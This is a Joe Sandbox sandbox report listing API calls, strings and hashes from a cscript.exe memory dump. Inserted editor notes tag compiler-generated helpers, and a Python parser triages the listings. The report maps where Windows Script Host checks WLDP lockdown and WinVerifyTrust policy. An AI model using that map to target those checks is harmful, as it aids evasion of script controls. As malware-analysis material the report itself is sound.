                                                                                                                                                                                                        • CoCreateInstance.OLE32(00407F49,00000000,00000017,00403BD4,00000000,?,?), ref: 00406578
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Heap$AllocCreateFromInstanceProcessStringmalloc
                                                                                                                                                                                                        • String ID: WSH$WScript
                                                                                                                                                                                                        • API String ID: 3077083409-1019903269
                                                                                                                                                                                                        • Opcode ID: 6928445d1b50afa88c3b11c99006ee605cb4f4d6420a7cd62446d7bc01ee4ea0
                                                                                                                                                                                                        • Instruction ID: 560a6986489f8629fd1b23c7dc1a4adb8787e617fdb34c779204ce88193ce0ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6928445d1b50afa88c3b11c99006ee605cb4f4d6420a7cd62446d7bc01ee4ea0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A9108B5A015159FCB14CF58D89076E77B5AF4C724F1600BAD902BB3D1CA3AAC028BD9
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040DDE0,004013B4), ref: 0040DCB1
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0040DDE0,?,0040DDE0,004013B4), ref: 0040DCBA
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,0040DDE0,004013B4), ref: 0040DCC5
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0040DDE0,004013B4), ref: 0040DCCC
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: a4e493c195cb21f8b02d62d8b52a8c883863b46e5ba8f8030a377f54bf840bbc
                                                                                                                                                                                                        • Instruction ID: f21b2daa11530dd6373aecba279cdae9d77e8dccccd31750deb2530c4811e439
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4e493c195cb21f8b02d62d8b52a8c883863b46e5ba8f8030a377f54bf840bbc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BD0C932001504ABD7002FF1FC0CA993E28EB4C226F058020F34D82021CA3244618B6A
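The two function blocks above that call GetSystemTimeAsFileTime / GetCurrentProcessId / GetCurrentThreadId / GetTickCount / QueryPerformanceCounter and SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess (with the 0xC0000409 STATUS_STACK_BUFFER_OVERRUN value visible on the stack) are the MSVC CRT helpers `__security_init_cookie` and `__report_gsfailure`, i.e. compiler-generated code in the cscript image rather than anything the sample added. The script below is an added example by the editor, not Joe Sandbox output and not part of the report: it parses the per-function "APIs" listings of this report format into call records and labels blocks that match those two CRT patterns, so an analyst can set them aside and concentrate on the COM and Windows Script Host functions. The sample text is a constructed excerpt copied from the listings above; the signature table and the `com-usage` label are the editor's own assumptions.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' listings and label known CRT helpers.

Editor's example (not part of the report). SAMPLE is constructed from the
report's own listing lines; CRT_SIGNATURES is the editor's assumption, based
on the well-known MSVC helpers __security_init_cookie and __report_gsfailure.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three function blocks copied from the listings above.
SAMPLE = """\
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040DC2D
• GetCurrentProcessId.KERNEL32 ref: 0040DC3C
• GetCurrentThreadId.KERNEL32 ref: 0040DC45
• GetTickCount.KERNEL32 ref: 0040DC4E
• QueryPerformanceCounter.KERNEL32(?), ref: 0040DC63
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040DDE0,004013B4), ref: 0040DCB1
• UnhandledExceptionFilter.KERNEL32(0040DDE0,?,0040DDE0,004013B4), ref: 0040DCBA
• GetCurrentProcess.KERNEL32(C0000409,?,0040DDE0,004013B4), ref: 0040DCC5
• TerminateProcess.KERNEL32(00000000,?,0040DDE0,004013B4), ref: 0040DCCC
Memory Dump Source
APIs
  • Part of subcall function 0040647E: GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00406542,00001000,?,?), ref: 004064A8
• CLSIDFromString.OLE32(?,00407F49,00001000,?,?), ref: 00406557
• CoCreateInstance.OLE32(00407F49,00000000,00000017,00403BD4,00000000,?,?), ref: 00406578
Strings
"""

# One listing line: optional "Part of subcall function XXXXXXXX:" prefix,
# Api.MODULE, optional "(args)", then "ref: XXXXXXXX". Both the form with
# parentheses plus a comma and the bare "Api.MODULE ref:" form occur.
API_RE = re.compile(
    r"^\s*\u2022\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                      # address of the call site in the dump
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)

    def direct_api_names(self) -> set:
        # Ignore calls attributed to subcalls; they belong to another function.
        return {c.api for c in self.calls if c.subcall_of is None}

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing at each 'APIs' header and collect its call lines."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        head = line.strip()
        if head == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if head in ("Strings", "Memory Dump Source"):
            current = None          # the API listing of this block is over
            continue
        m = API_RE.match(line)
        if m and current is not None:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            sub = int(m["sub"], 16) if m["sub"] else None
            current.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return blocks

# Editor's assumption: API sets that identify MSVC CRT helpers.
CRT_SIGNATURES = {
    "__security_init_cookie": {"GetSystemTimeAsFileTime", "GetCurrentProcessId",
                               "GetCurrentThreadId", "GetTickCount",
                               "QueryPerformanceCounter"},
    "__report_gsfailure": {"SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
                           "GetCurrentProcess", "TerminateProcess"},
}
STATUS_STACK_BUFFER_OVERRUN = "C0000409"

def classify(block: FunctionBlock) -> str:
    names = block.direct_api_names()
    if CRT_SIGNATURES["__security_init_cookie"] <= names:
        return "__security_init_cookie"
    if CRT_SIGNATURES["__report_gsfailure"] <= names and any(
            STATUS_STACK_BUFFER_OVERRUN in c.args for c in block.calls):
        return "__report_gsfailure"
    if any(c.module.upper() in ("OLE32", "OLEAUT32") for c in block.calls):
        return "com-usage"          # editor's label: worth a closer look
    return "unclassified"

def triage(text: str) -> List[Tuple[str, str]]:
    """Return (label, first call-site address) per block, in report order."""
    return [(classify(b), f"{b.calls[0].ref:08X}") for b in parse_blocks(text) if b.calls]

if __name__ == "__main__":
    for label, ref in triage(SAMPLE):
        print(f"{ref}  {label}")
```

Run over the full report text, `triage` lists every function block with its first call-site address, so the CRT-generated helpers can be filtered out and the remaining blocks (CoCreateInstance / CLSIDFromString with the `WSH$WScript` strings, the event-log and `Software\Microsoft\Windows Script Host\Settings` accesses) reviewed by hand.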
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: WScript.CreateObject
                                                                                                                                                                                                        • API String ID: 0-1366894974
                                                                                                                                                                                                        • Opcode ID: f7e36573457bb77bd60b42ef005b024f04f9a0f0ef535962e079bef0ceaa8974
                                                                                                                                                                                                        • Instruction ID: 4bd609fc3e6192f08040643ef08922931b7560f8a5c221b5b1e7214b417d8a42
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7e36573457bb77bd60b42ef005b024f04f9a0f0ef535962e079bef0ceaa8974
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46A1BE71608601DFC310DF25D881AEEB7A5AFC8324F15456EF94697390DB38EC85CB9A
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00406542,00001000,?,?), ref: 004064A8
                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00406542,00001000,?,?), ref: 004064AF
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,00406542,00001000,?,?), ref: 0040E8CA
                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00406542,00001000,?,?), ref: 0040E8D1
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 040fd4291d2b6ea4c6cd22f213d779cf871ace4c501feb3513e57c655884c377
• Instruction ID: 3b3e1ba3c60ca2afead59e2f56a61597d75dd61d1aa69d56b43153b9227ae2f0
• Opcode Fuzzy Hash: 040fd4291d2b6ea4c6cd22f213d779cf871ace4c501feb3513e57c655884c377
• Instruction Fuzzy Hash: 4AF0F431505201EBD7245F689D08B677AA8EB04331F21C53BF20ADB2D0DA78C860871E
APIs
• InitializeCriticalSection.KERNEL32(00419498,00418AD8,000000A0,00406E82), ref: 0040A9E8
• GetVersionExA.KERNEL32(00000094), ref: 0040AA06
  • Part of subcall function 0040AADC: GetUserDefaultLCID.KERNEL32 ref: 0040AAFD
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: CriticalDefaultInitializeSectionUserVersion
• String ID:
• API String ID: 340135912-0
• Opcode ID: b122c2af105eb3dab67ecf352cf94542841c121942755b25bbd72f52c390a1fd
• Instruction ID: 1f3f504b120a8d69de8352e7beb81f4f3034842f19eeff67aa9aa94f4de85240
• Opcode Fuzzy Hash: b122c2af105eb3dab67ecf352cf94542841c121942755b25bbd72f52c390a1fd
• Instruction Fuzzy Hash: AC117330B48354CEDB209FA49E097DA77B0A745315F1085BED046622D0D77C0999DF2F
APIs
• GetProcessHeap.KERNEL32 ref: 004068E3
• HeapAlloc.KERNEL32(00000000), ref: 004068EA
• VariantClear.OLEAUT32(?), ref: 00406925
• VariantClear.OLEAUT32(?), ref: 00406930
• SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00406941
• VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0040696F
• GetStdHandle.KERNEL32(000000F5,00000000), ref: 004069F5
• VariantClear.OLEAUT32(?), ref: 00406A10
• VariantClear.OLEAUT32(?), ref: 00406A1B
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406A28
• HeapFree.KERNEL32(00000000), ref: 00406A2F
• SysAllocString.OLEAUT32(null), ref: 0040E99D
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: Variant$ClearHeap$AllocProcess$ArrayChangeElementFreeHandleSafeStringType
• String ID: null
• API String ID: 253374567-634125391
• Opcode ID: f996bf276ee35a2511a7b0e07ace298a1b850a4482f677eccf0c7de63b7fd00e
• Instruction ID: 15a69adfb9b16d14882fb75cbcc2fff1e5f837e09cb046d0c1779e644bab93a9
• Opcode Fuzzy Hash: f996bf276ee35a2511a7b0e07ace298a1b850a4482f677eccf0c7de63b7fd00e
• Instruction Fuzzy Hash: 4051B3716043129BC710EF64C844A5BB7E8BF85710F15893AF946F7390E738DD158BAA
APIs
• GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040BAA7
• HeapAlloc.KERNEL32(00000000), ref: 0040BAAE
• GetConsoleMode.KERNEL32(?,?,?,00000001,?,00000001), ref: 0040BBA5
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000001,?,00000001), ref: 0040BBC1
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040BBFA
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BC21
• GetProcessHeap.KERNEL32(00000000,?), ref: 0040BC5E
• HeapFree.KERNEL32(00000000), ref: 0040BC65
• WriteConsoleW.KERNEL32(?,?,00003FFF,?,00000000,?,00000001,?,00000001), ref: 0040BCA1
• GetLastError.KERNEL32 ref: 0040E4D1
• GetLastError.KERNEL32 ref: 0040E521
• GetLastError.KERNEL32 ref: 0040E533
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: Heap$ErrorLast$ByteCharConsoleMultiProcessWideWrite$AllocFileFreeMode
• String ID:
• API String ID: 702828211-0
• Opcode ID: 17d68a262ad0ad13c16cb3b5bd98fa0aa377b81858aefa5a553bbee259396687
• Instruction ID: 596d1ddd5f1718502e652dfd08121a6ad3e83a279c4f5ca0c544bc886b90f8e7
• Opcode Fuzzy Hash: 17d68a262ad0ad13c16cb3b5bd98fa0aa377b81858aefa5a553bbee259396687
• Instruction Fuzzy Hash: 27B1A675A043299BDB249B558C88BAA76B4EB04300F1045BBE919B72D1DB789D808F9D
APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 004184A1
• SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,00000000,?,00000000), ref: 004184D4
• FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,?,00000000), ref: 00418512
• GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 0041853C
• GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?,?,00000000), ref: 00418607
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
• String ID: %s\%s$MUI
• API String ID: 1597595625-2651373239
• Opcode ID: 8c5a93233d190e8d2c82515c0805d0cb6c25342313bf677edf95d8e15bc1bfc6
• Instruction ID: 66b5c6eb8640beb8cce7ea1066c750ae159676fa1682e267011f5cbff90e08e0
• Opcode Fuzzy Hash: 8c5a93233d190e8d2c82515c0805d0cb6c25342313bf677edf95d8e15bc1bfc6
• Instruction Fuzzy Hash: 27B15271E0026D9BCF319B258C54BEB77799B84344F0484FEEA49A7241DE388EC58B5D
APIs
• GetPrivateProfileIntW.KERNEL32(Options,?,?,?), ref: 0041759B
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0041755A,DisplayLogo), ref: 004175B1
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0041755A,DisplayLogo,?,00000001,?,?,004125DB,00000000,?,00000000), ref: 004175BD
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: ByteCharErrorLastMultiPrivateProfileWide
• String ID: Options
• API String ID: 1820523601-529056539
• Opcode ID: c6f9bc35396b168c47ecb402d8a199e9ad2469b77339cf2df98bf890390a6b84
• Instruction ID: 45ecead9bab1df625afdb0ac8a82dddc26017bb8c26eac98b514685456610749
• Opcode Fuzzy Hash: c6f9bc35396b168c47ecb402d8a199e9ad2469b77339cf2df98bf890390a6b84
• Instruction Fuzzy Hash: 33318271506121BE9B251F6A8C0DEFB7E6DDF463B07144229B815E22D0DA788D90C6FA
APIs
• RegOpenKeyExA.ADVAPI32(80000000,0000002E,00000000,00020019,?), ref: 0041292F
• RegQueryValueExA.ADVAPI32(?,00403EFE,00000000,00000000,?,00000104), ref: 00412964
• RegCloseKey.ADVAPI32(?), ref: 00412972
• RegEnumKeyExA.ADVAPI32(80000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004129D2
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_cscript.jbxd
Similarity
• API ID: CloseEnumOpenQueryValue
• String ID: .$Open$Open2$WSFFile$WSHFile
• API String ID: 3984146545-2336295846
• Opcode ID: 8bacad96530e45c068cb3ba1497a263a3a6bcef4c2649650986125610da875db
• Instruction ID: 2c199e966a87c801c1f8a97b8d1ae79da00880ed70de3d683bf5a2082176a7ec
• Opcode Fuzzy Hash: 8bacad96530e45c068cb3ba1497a263a3a6bcef4c2649650986125610da875db
• Instruction Fuzzy Hash: AD31F6B1B1011DAFE7209B54CE49BFB76ACEF10744F2041ABF505E2180E7F89ED48A69
APIs
• RegQueryValueExW.ADVAPI32(00000001,Enabled,00000000,?,?,?,00000000,00000001,Enabled), ref: 00407945
• WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,Enabled), ref: 0040FD6B
• WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,?,00000000,00000000), ref: 0040FD9A
• RegQueryValueExA.ADVAPI32(00000001,00000000,00000000,?,?,?,00000000,00000001,Enabled), ref: 0040FDDE
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiQueryValueWide
                                                                                                                                                                                                        • String ID: Enabled$false
                                                                                                                                                                                                        • API String ID: 649492702-109718029
                                                                                                                                                                                                        • Opcode ID: 1ab463d1ffa90133f23adfce826a98077402707cb85254892fcb9da556682ca5
                                                                                                                                                                                                        • Instruction ID: 46cbee9f48b306dd78d0258ef6d6e9ecaa5d4ea680c57d9b12f61c1a3253aff7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ab463d1ffa90133f23adfce826a98077402707cb85254892fcb9da556682ca5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C5178B1A041199AFB349F24CD41FEB77689F05320F2043B6E615F62D1DB38AE85CA5E
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 00414930
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041493C
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00414990
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00000000), ref: 004149AE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast$AddressFreeLibraryProc
                                                                                                                                                                                                        • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                        • API String ID: 1171437518-2532474036
                                                                                                                                                                                                        • Opcode ID: 8d70539afc74f520e69f6310ba9ba90cd979cd881f28a4eb593f7a3145234b56
                                                                                                                                                                                                        • Instruction ID: 81a9f99170fcd000af032a9a6bb0c46158e7e05cdb389610e7ce67482713d238
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d70539afc74f520e69f6310ba9ba90cd979cd881f28a4eb593f7a3145234b56
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6414EB6D113299BCB11CFA9C8806DEBBB4BF84710F21412ED809BB340D7789D458B99
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00407DA1,?,?,?,?,?,?,?), ref: 0040B1E9
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0040B1FF
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0040B216
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?), ref: 0040B2B6
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?), ref: 0041124B
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$ErrorFreeLastLoad
                                                                                                                                                                                                        • String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
                                                                                                                                                                                                        • API String ID: 1004692917-3104440107
                                                                                                                                                                                                        • Opcode ID: c2e59984b4ab170b1a6120ddab7edd5e23153710f18b4e21200bd8bc1348e5c5
                                                                                                                                                                                                        • Instruction ID: 7e4653c1a3fee452954452bc2918e8038a6612f0526473c5e9a9dfe65460cd0e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2e59984b4ab170b1a6120ddab7edd5e23153710f18b4e21200bd8bc1348e5c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03217E75900216ABC7118F98D898BAEBBB4EB44711F1481BAED09F7390DB7899408BDD
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040C93B: memcmp.MSVCRT ref: 0040C93F
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00413469
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0041349B
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004134A9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeString$ClearVariantmemcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1922676145-0
                                                                                                                                                                                                        • Opcode ID: b96cb0af5c2a5b21c3f0e5ab5712e65ff4d8a3a00d1936c8d4b01886c4d95c54
                                                                                                                                                                                                        • Instruction ID: 4802c415fbf222ec321ac108cc48985698185337f681291f2647af2c80b3a450
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b96cb0af5c2a5b21c3f0e5ab5712e65ff4d8a3a00d1936c8d4b01886c4d95c54
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69C1AE71E01119AFCF14DF98D884AEEBBB1FF08311F15816AE905A7350D739AE81CB98
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040A6F5: LoadStringW.USER32(?,?,00000800,00000C89), ref: 0040A737
                                                                                                                                                                                                          • Part of subcall function 0040A6F5: SysAllocString.OLEAUT32(?), ref: 0040A74A
                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?), ref: 0040B978
                                                                                                                                                                                                          • Part of subcall function 0040B9F0: GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040BAA7
                                                                                                                                                                                                          • Part of subcall function 0040B9F0: HeapAlloc.KERNEL32(00000000), ref: 0040BAAE
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040B98A
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0040B991
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0040B998
                                                                                                                                                                                                          • Part of subcall function 0040BCDF: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0040B95E,?), ref: 0040BD1E
                                                                                                                                                                                                          • Part of subcall function 0040BCDF: SysAllocString.OLEAUT32(?), ref: 0040BD2F
                                                                                                                                                                                                          • Part of subcall function 0040BCDF: LocalFree.KERNEL32(00000000,?,00000000,0040B95E,?), ref: 0040BD51
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$Free$Alloc$Heap$FormatHandleLoadLocalMessageProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1815185728-0
                                                                                                                                                                                                        • Opcode ID: b332ea6df461abc03c508f34a0d2ae6f7877696deb9b86c69f5a38ab7343fecb
                                                                                                                                                                                                        • Instruction ID: ab9d785b819f1ac0f170f09a6a3d2c002b02da18d416643fd1cc05274107659e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b332ea6df461abc03c508f34a0d2ae6f7877696deb9b86c69f5a38ab7343fecb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE316F71900209AFCF00DFA6CC848EFBBB9FF44354B10807AE905A3251DB359E51DB99
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • malloc.MSVCRT ref: 00416DE4
                                                                                                                                                                                                        • SysStringLen.OLEAUT32(?), ref: 00416E07
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00416E15
                                                                                                                                                                                                        • SysStringLen.OLEAUT32(?), ref: 00416E25
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00416E32
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00416E48
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00416E57
                                                                                                                                                                                                        • free.MSVCRT(00000000,?,004164F1,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416E5E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$AllocFree$freemalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 945414394-0
                                                                                                                                                                                                        • Opcode ID: 55c48f60214e7f9180a9248ac646fab8acb5ae5b94e0fb3bf9abca03db32360b
                                                                                                                                                                                                        • Instruction ID: 60d504b35f24769532adb80d2ae3f0e49c564e3dfa5237cd826697d038348f4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55c48f60214e7f9180a9248ac646fab8acb5ae5b94e0fb3bf9abca03db32360b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B119E35100706AFDB215F29ED08A977BF5EF00360F11C53AF859C22A0DB79D8A0CB59
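The records above are the Joe Sandbox IDA plugin's per-function summaries for the memory dump of process 7 (the cscript image at 00400000). To pivot on them, for instance to list which functions resolve WLDP or WinTrust exports at run time through GetProcAddress (calls a static import table never shows), or to index functions by Opcode ID so the function inventories of two reports can be diffed, the record text has to be parsed. The Python below is an added example, not part of the Joe Sandbox report or its tooling: the parser, the record and query names are this example's own, and the sample text is an abridged copy of two records from this report.

```python
"""Parse Joe Sandbox IDA-plugin function records (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Abridged copy of two records from the report above (the WLDP resolver and the
# VariantClear helper); only API lines were dropped, the format is unchanged.
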